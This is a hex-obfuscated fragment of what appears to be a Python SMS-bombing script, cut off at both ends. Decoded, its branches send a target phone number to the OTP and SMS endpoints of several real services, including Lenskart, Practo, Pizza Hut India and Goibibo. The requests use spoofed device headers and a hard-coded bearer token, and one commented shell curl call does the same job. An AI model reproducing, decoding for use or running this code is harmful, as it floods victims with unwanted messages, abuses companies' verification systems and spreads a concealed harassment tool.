x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x44\x4e\x54\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x75\x62\x6d\x69\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x3a\x20\x27\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x2f\x63\x6c\x69\x65\x6e\x74\x73\x2f\x6c\x65\x6e\x73\x6b\x61\x72\x74\x2f\x73\x6d\x73\x41\x70\x69\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x39\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x27\x3a\x20\x27\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x32\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x41\x6e\x64\x72\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x27\x3a\x20\x27\x31\x35\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x39\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x27\x3a\x27\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x3a\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x3a\x32\x2e\x30\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x3a\x41\x6e\x64\x72\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x3a\x31\x35\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x3a\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x22\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x39\x36\x22\x20\x2d\x64\x20\x20\x22\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x3d\x50\x72\x61\x63\x74\x6f\x2b\x41\x6e\x64\x72\x6f\x69\x64\x2b\x41\x70\x70\x26\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x3d\x26\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x3d\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x26\x22\x20\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x75\x63\x63\x65\x73\x73\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x75\x74\x68\x6f\x72\x69\x7a\x61\x74\x69\x6f\x6e\x27\x3a\x20\x27\x42\x65\x61\x72\x65\x72\x20\x5a\x58\x6c\x4b\x61\x47\x4a\x48\x59\x32\x6c\x50\x61\x55\x70\x4a\x56\x58\x70\x4a\x4d\x55\x35\x70\x53\x58\x4e\x4a\x62\x6c\x49\x31\x59\x30\x4e\x4a\x4e\x6b\x6c\x72\x63\x46\x68\x57\x51\x30\x6f\x35\x4c\x6d\x56\x35\x53\x6d\x74\x5a\x57\x46\x4a\x6f\x53\x57\x70\x77\x4e\x30\x6c\x75\x55\x6e\x5a\x68\x4d\x6c\x5a\x31\x53\x57\x70\x76\x61\x57\x49\x7a\x51\x58\x68\x69\x52\x30\x70\x79\x5a\x45\x63\x78\x62\x47\x52\x59\x53\x54\x42\x4e\x57\x45\x4a\x79\x54\x6c\x52\x47\x4e\x57\x4e\x71\x51\x6a\x42\x6b\x62\x55\x5a\x73\x53\x57\x6c\x33\x61\x56\x6c\x59\x56\x6a\x42\x68\x51\x30\x6b\x32\x53\x57\x31\x57\x4e\x56\x4e\x71\x51\x6d\x78\x58\x52\x55\x5a\x77\x56\x44\x4a\x73\x53\x31\x4d\x78\x57\x58\x68\x56\x56\x32\x78\x4e\x55\x54\x42\x77\x62\x31\x6c\x72\x5a\x47\x70\x68\x56\x54\x6c\x77\x55\x32\x74\x73\x56\x6d\x56\x72\x61\x33\x68\x55\x62\x57\x78\x4c\x54\x31\x4d\x31\x62\x47\x56\x56\x63\x44\x46\x58\x56\x6d\x4e\x34\x59\x6b\x64\x47\x57\x46\x56\x58\x62\x46\x42\x68\x56\x57\x74\x33\x56\x47\x74\x53\x62\x6d\x46\x56\x65\x45\x52\x54\x62\x6d\x52\x71\x59\x6c\x64\x34\x4d\x46\x64\x57\x61\x45\x74\x4f\x56\x6d\x39\x36\x55\x32\x35\x61\x61\x31\x64\x46\x53\x6a\x5a\x5a\x56\x6d\x52\x53\x59\x56\x55\x35\x63\x46\x4e\x55\x56\x6c\x42\x53\x4d\x55\x59\x30\x56\x44\x42\x6b\x55\x6b\x35\x46\x4d\x58\x42\x4e\x56\x32\x78\x61\x56\x6b\x5a\x56\x4d\x56\x52\x47\x55\x6c\x4a\x4f\x56\x54\x56\x56\x57\x54\x4e\x53\x55\x46\x59\x77\x4d\x44\x46\x55\x56\x32\x74\x33\x5a\x57\x78\x77\x63\x56\x70\x36\x56\x6b\x35\x68\x61\x30\x56\x36\x56\x31\x5a\x53\x54\x6b\x31\x47\x63\x48\x46\x58\x56\x32\x78\x4e\x55\x54\x42\x77\x64\x31\x6c\x36\x54\x6b\x35\x68\x56\x54\x6c\x77\x55\x32\x30\x35\x61\x31\x4e\x47\x53\x6a\x4e\x55\x4d\x6d\x73\x30\x5a\x47\x31\x52\x65\x6c\x70\x45\x54\x6b\x31\x69\x56\x45\x5a\x76\x57\x54\x49\x31\x55\x32\x4e\x57\x62\x46\x68\x55\x62\x6b\x70\x4e\x59\x6c\x55\x31\x4d\x6c\x6c\x73\x54\x54\x56\x68\x4d\x58\x42\x5a\x56\x32\x31\x34\x61\x56\x4a\x36\x62\x44\x4e\x58\x62\x47\x68\x4c\x59\x55\x64\x4f\x53\x47\x45\x79\x62\x45\x31\x52\x4d\x48\x42\x76\x57\x6b\x5a\x6b\x55\x6d\x46\x56\x4f\x58\x42\x54\x62\x54\x6c\x72\x55\x30\x5a\x4b\x4d\x31\x51\x79\x61\x7a\x52\x6b\x62\x56\x46\x36\x57\x6b\x52\x4f\x54\x57\x4a\x55\x52\x6d\x39\x5a\x4d\x6a\x56\x54\x59\x31\x5a\x73\x57\x46\x52\x75\x53\x6b\x31\x69\x56\x54\x55\x79\x57\x57\x78\x4e\x4e\x57\x45\x78\x63\x46\x6c\x58\x62\x58\x68\x70\x55\x6e\x70\x73\x4d\x31\x64\x73\x61\x45\x74\x68\x52\x30\x35\x49\x59\x54\x4a\x73\x54\x56\x45\x77\x63\x48\x4e\x61\x56\x57\x68\x43\x59\x56\x55\x35\x63\x56\x4a\x55\x52\x6b\x39\x57\x52\x33\x4d\x78\x56\x47\x35\x77\x61\x6b\x31\x56\x4d\x55\x56\x56\x57\x45\x35\x4b\x59\x6c\x52\x57\x63\x46\x64\x74\x62\x45\x70\x4f\x61\x7a\x46\x56\x56\x6c\x52\x47\x55\x46\x5a\x48\x63\x33\x70\x55\x57\x48\x42\x79\x5a\x44\x41\x31\x53\x55\x31\x44\x4e\x56\x52\x61\x4d\x31\x70\x34\x55\x6d\x78\x4f\x5a\x6c\x64\x74\x54\x54\x4e\x61\x53\x45\x35\x70\x54\x56\x64\x53\x4e\x47\x4a\x57\x56\x6b\x64\x6b\x53\x45\x45\x78\x59\x57\x35\x57\x4d\x6b\x39\x46\x4e\x54\x56\x57\x65\x6b\x49\x79\x5a\x44\x45\x35\x54\x56\x52\x75\x54\x6b\x4a\x4e\x62\x57\x68\x47\x56\x6b\x56\x30\x65\x6b\x6c\x70\x64\x32\x6c\x6b\x57\x45\x4a\x72\x57\x56\x68\x53\x62\x46\x70\x44\x53\x54\x5a\x4e\x56\x46\x55\x78\x54\x31\x52\x72\x4d\x30\x31\x36\x61\x33\x64\x4f\x52\x46\x55\x78\x54\x6e\x6c\x33\x61\x57\x52\x59\x54\x6d\x78\x6a\x61\x32\x78\x72\x53\x57\x70\x76\x61\x55\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x45\x31\x45\x51\x58\x64\x4e\x51\x7a\x42\x33\x54\x55\x52\x42\x64\x30\x78\x55\x51\x58\x64\x4e\x52\x45\x46\x30\x54\x55\x52\x42\x64\x30\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x30\x6c\x70\x64\x32\x6c\x61\x4d\x6c\x5a\x31\x57\x6c\x68\x4b\x61\x47\x52\x48\x56\x6d\x74\x4a\x61\x6d\x39\x34\x54\x6c\x52\x56\x4e\x55\x39\x55\x59\x33\x70\x50\x56\x45\x45\x77\x54\x6c\x52\x56\x4d\x32\x5a\x54\x64\x32\x6c\x68\x56\x30\x59\x77\x53\x57\x70\x76\x65\x45\x35\x55\x56\x54\x56\x50\x56\x47\x4e\x36\x54\x31\x52\x42\x4d\x45\x78\x44\x53\x6d\x78\x6c\x53\x45\x46\x70\x54\x32\x70\x46\x4d\x55\x35\x71\x51\x54\x52\x4e\x65\x6d\x4d\x31\x54\x55\x52\x53\x4f\x53\x35\x43\x4d\x47\x52\x31\x4e\x46\x6c\x45\x51\x56\x70\x74\x54\x47\x4e\x55\x4d\x30\x5a\x48\x4d\x30\x52\x70\x53\x6e\x51\x78\x4e\x33\x52\x7a\x52\x47\x6c\x4a\x61\x56\x5a\x6b\x55\x46\x6c\x34\x5a\x48\x49\x79\x56\x7a\x6c\x74\x65\x6e\x6b\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x73\x6f\x75\x72\x63\x65\x2d\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x50\x57\x41\x46\x57\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x6e\x67\x75\x61\x67\x65\x63\x6f\x64\x65\x27\x3a\x20\x27\x65\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x6c\x6f\x67\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x41\x4b\x41\x5f\x41\x32\x3d\x41\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x75\x73\x74\x6f\x6d\x65\x72\x22\x3a\x7b\x22\x4d\x6f\x62\x69\x6c\x65\x4e\x6f\x22\x3a\x70\x6e\x2c\x22\x55\x73\x65\x72\x4e\x61\x6d\x65\x22\x3a\x70\x6e\x2c\x22\x6d\x65\x72\x63\x68\x61\x6e\x74\x49\x64\x22\x3a\x22\x39\x38\x64\x31\x38\x64\x38\x32\x2d\x62\x61\x35\x39\x2d\x34\x39\x35\x37\x2d\x39\x63\x39\x32\x2d\x33\x66\x38\x39\x32\x30\x37\x61\x33\x34\x66\x36\x22\x7d\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x61\x72\x74\x2f\x73\x65\x6e\x64\x2d\x6f\x74\x70\x3f\x6c\x61\x6e\x67\x43\x6f\x64\x65\x3d\x65\x6e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x33\x32\x3b\x20\x78\x33\x32\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x37\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x3f\x73\x6d\x73\x3d\x73\x75\x63\x63\x65\x73\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x70\x67\x72\x61\x64\x65\x2d\x69\x6e\x73\x65\x63\x75\x72\x65\x2d\